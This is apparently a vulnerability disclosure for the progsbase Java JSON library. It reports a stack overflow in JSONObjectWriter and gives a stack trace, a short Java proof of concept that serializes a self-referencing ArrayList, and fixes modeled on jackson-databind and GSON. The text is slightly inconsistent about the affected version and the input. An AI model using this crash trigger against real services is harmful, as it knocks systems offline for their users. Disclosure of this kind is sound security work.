Stack overflow error caused by progsbase serialization List #4
Description
Stack overflow error caused by progsbase serialization List
Description
progsbase before v0.4.0 was discovered to contain a stack overflow via the List parameter. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted string.
Error Log
Exception in thread "main" java.lang.StackOverflowError
at JSON.json.json.CreateArrayElement(json.java:47)
at com.progsbase.libraries.JSON.JSONObjectWriter.unjavaifyJSONArrayList(JSONObjectWriter.java:118)
at com.progsbase.libraries.JSON.JSONObjectWriter.unjavaifyJSONValue(JSONObjectWriter.java:70)
at com.progsbase.libraries.JSON.JSONObjectWriter.unjavaifyJSONArrayList(JSONObjectWriter.java:122)
at com.progsbase.libraries.JSON.JSONObjectWriter.unjavaifyJSONValue(JSONObjectWriter.java:70)
at com.progsbase.libraries.JSON.JSONObjectWriter.unjavaifyJSONArrayList(JSONObjectWriter.java:122)
at com.progsbase.libraries.JSON.JSONObjectWriter.unjavaifyJSONValue(JSONObjectWriter.java:70)
at com.progsbase.libraries.JSON.JSONObjectWriter.unjavaifyJSONArrayList(JSONObjectWriter.java:122)
at com.progsbase.libraries.JSON.JSONObjectWriter.unjavaifyJSONValue(JSONObjectWriter.java:70)
at com.progsbase.libraries.JSON.JSONObjectWriter.unjavaifyJSONArrayList(JSONObjectWriter.java:122)
at com.progsbase.libraries.JSON.JSONObjectWriter.unjavaifyJSONValue(JSONObjectWriter.java:70)
at com.progsbase.libraries.JSON.JSONObjectWriter.unjavaifyJSONArrayList(JSONObjectWriter.java:122)
at com.progsbase.libraries.JSON.JSONObjectWriter.unjavaifyJSONValue(JSONObjectWriter.java:70)
at com.progsbase.libraries.JSON.JSONObjectWriter.unjavaifyJSONArrayList(JSONObjectWriter.java:122)
at com.progsbase.libraries.JSON.JSONObjectWriter.unjavaifyJSONValue(JSONObjectWriter.java:70)
at com.progsbase.libraries.JSON.JSONObjectWriter.unjavaifyJSONArrayList(JSONObjectWriter.java:122)
at com.progsbase.libraries.JSON.JSONObjectWriter.unjavaifyJSONValue(JSONObjectWriter.java:70)
at com.progsbase.libraries.JSON.JSONObjectWriter.unjavaifyJSONArrayList(JSONObjectWriter.java:122)
at com.progsbase.libraries.JSON.JSONObjectWriter.unjavaifyJSONValue(JSONObjectWriter.java:70)
at com.progsbase.libraries.JSON.JSONObjectWriter.unjavaifyJSONArrayList(JSONObjectWriter.java:122)
at com.progsbase.libraries.JSON.JSONObjectWriter.unjavaifyJSONValue(JSONObjectWriter.java:70)
at com.progsbase.libraries.JSON.JSONObjectWriter.unjavaifyJSONArrayList(JSONObjectWriter.java:122)
PoC
<dependency>
<groupId>com.progsbase.libraries</groupId>
<artifactId>JSON</artifactId>
<version>0.4.0</version>
</dependency>import com.progsbase.libraries.JSON.JSONObjectWriter;
import java.util.ArrayList;
public class PoC3 {
public static void main(String[] args) {
ArrayList<Object> list = new ArrayList<>();
list.add(list);
JSONObjectWriter.writeJSON(list);
}
}Rectification Solution
-
Refer to the solution of jackson-databind: Add the depth variable to record the current parsing depth. If the parsing depth exceeds a certain threshold, an exception is thrown. (FasterXML/jackson-databind@fcfc499)
-
Refer to the GSON solution: Change the recursive processing on deeply nested arrays or JSON objects to stack+iteration processing.((google/gson@2d01d6a20f39881c692977564c1ea591d9f39027))